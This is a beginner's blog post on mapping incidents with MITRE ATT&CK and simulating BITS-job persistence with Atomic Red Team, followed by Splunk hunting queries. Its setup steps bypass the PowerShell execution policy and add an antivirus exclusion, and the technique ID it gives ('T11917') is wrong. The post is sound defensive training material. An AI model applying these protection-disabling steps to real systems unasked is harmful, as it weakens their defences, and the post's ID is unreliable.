Demostrating Mitre ATT&CK framework with Atomic Red Team
Hey guys coming back to learning journey, I already wrote multiple blogs for blue teaming. But today we are looking things in Offesive manner.
Today, I will show you how can we use Mitre att&ck framework for incident analysis. We are also using Atomic Red Team tool to demostrate attack scenario for understanding Offensive side, that shows how did attacker play his gameplay ? We will also use “Lockheed Martin cyber kill chain”.
During Research of an Incident, it becomes important to understand the intension of an attacker by thinking with attacker mindset. Without wasting time, lets move to topic.
🍁How to identify evil ?
Baseline your environment:
- By looking on behaviour of system, How the normal behaviour looks like. Its looks different in every environment. This helps to compare good state with bad state.
Use lockheed martin cyber kill chain:
- It is best approach to find currently and next state of attacker, this kill chain contains Reconnaissance, Weaponisation, Delivery, Exploitation, Installation, Command and Control, Action on Objective. I have explained this kill chain in last blog you can read from there.
🍁What defense Mechanism we can use?
- Adding layer by layer of security. Example : MFA ( Multi factor Authentication) like asking for OTP while login.
- Delaying attacker as we can from reaching their objective.-> MFA
- Another way we can map out an attacker using Mitre attack framework. it helps analyst to understand Tactics, Techniques, Processures (TTPS).
🍁How can we use Mitre attack framework?
I have explained already in detail in last blog but, I will give you overview of it. It varies, What are you trying to look for or understand ?
- Is it specific event ?
- Perticular advasary.
- Something completely different.
- Mapping out what is possible for an attacker. when it comes to TTPS. This helps us to understand, What phase attacker may be in, or What phase you begin your investigation.
- We can use this to know more about adversaries. Ex : what is APTXYZ Target or use as tool.
🍁How I Prevent attacker with such low budget ?
- No matter how costly or cheap your security controls tools are, if you prevent attacker from getting to their actions on a objective you win.
- Our main focus here is to stop reaching their goals then we can eradication (remove) all malicious data.
- We can use open-source tools. Yes, they are still really useful.
- Use Mitre Attack framework for mapping incident stages.
- Use Atomic Red Team to create similar offensive scenario to study the attacker moves and guess next move.
🍁What is Atomic Red Team tool ?
It is tool used to demostrate attacking scenario that uses Mitre Attack framework to demostrate the scenario. Every Atomic Test is written for a specific MITRE Technique where the files are named as its mapped MITRE Technique ID. I already explained this in detailed here.
🍁Taking real Scenario :
You are working for XYZ Pvt. Ltd. company and your team has found suspicious new shedule task, Executes after every 15 min. And as L1 security analyst task of investingation is assigned to you. Demostrate the your steps and Tell how will you handle whole incident.
Yaa, Its prepared by me but its similar to i have read on https://thehackernews.com/ , I just change name of target and some words.
🍁Steps to handle scenario :
Step 1 : Go to mitre attack and check schedule task under fallowing tactics: execution, perciestance, Privilege Escalation.
Step 2 : What will be the attacker next move/tactic. And we can see that, that is Defense Evasion.
Step 3 : Analyst next move will be checking any antvirus,EDR,firwall has been disabled.
Tip for security analyst : During indentifing such event putting yourself in known compromised environment will help you understand what suspicious or anomalous activity may look like. For this we can use two way:
1. prebuild labs hosted on platforms like cyberdefender or LetsDefend
2. Use tool like Atomic Red Team.
Here, I will go with Atomic Red Team tool. There are some things that we have to look before Demostrating attacking scenario.
Note : windows machine with splunk and sysmon installed. We are running scripts so we have to disable execution policies.
Set-ExecutionPolicy Bypass -scope CurrentUserWe already studied this tool in last blog. Don’t worry, Here I will help you with some required commands wherever that are neccessary.
- Installation of AtomicRedTeam
Install-AtomicRedTeam -getAtomics- Add exclusion: Go to windows security, add exclusion, by selecting that folder using GUI.
- Now type cmdlet :
Install-AtomicRedTeam -getAtomics -Force- List out What is available tactics :
Invoke-AtomicTest ALL -ShowDetailsBrief- We interest in Pesistance tactic : specificly in BITS jobs, click on that, listed ID: T11917
- To see What type of TTPs are available in ART we use:
Invoke-AtomicTest T11917 -ShowDetailsBrief- It list 4 options. We can generates this technique using them. Here we run all.
Invoke-AtomicTest T11917Note : After closing powershell, if next time we have to run tool we get error.
Error solution : that is mean we have to reimport the module.
Import-Module "C:\AtomicRedTeam\locationOfFile\Invoke-AtomicRedTeam.psd1" -ForceInvoke-AtomicTest- Ok, process completed: We will analyse all events in splunk.
🕸 Analysis of Incident in Splunk :
- We are not extactly sure what we looking at we use search :
index=endpoint bits- Our next step is to clean up the query:
index=endpoint bits
| table _time,ParentImage,ParentCommandline,Image, Commandline
| sort +_timeQuery Explaination : Creating table with columns. these way allow us see relation between parent and child. Helps quickly identify potential suspicious activity and lastly sorting the time.
- Before go down and look for bits activity: we will look into mitre attack again, we look into Detection Section, See following terms comes in logs: Transfer, Create, AddFile, SetNotifyFlags,etc.
- found cmd with /transfer , /creates.
- Does it mean see these in your environment is bad thing definately not, I alredy mentioned in Baseline your environment.
- Above point is the Reason why baseline the Environment before starting the process, that is to understand what your env looks like.
- I think definately, its one of the good threat hunting technique.
- Just make sure that weed out (separate out) all the legitimate activity and then might be able to find an evil.
✅Conclusion :
Why am I followed this framework,this tool, cyber kill chain during investigating threats. Beacause, Putting in such environment and practice that makes you quickly indentify evil.
Thats all for today, If you like my content give me clap👏 , follow me 👇and suggest next topic for blog. I will research out and find you precise and accurate content, also try to exaplain you in simple words.
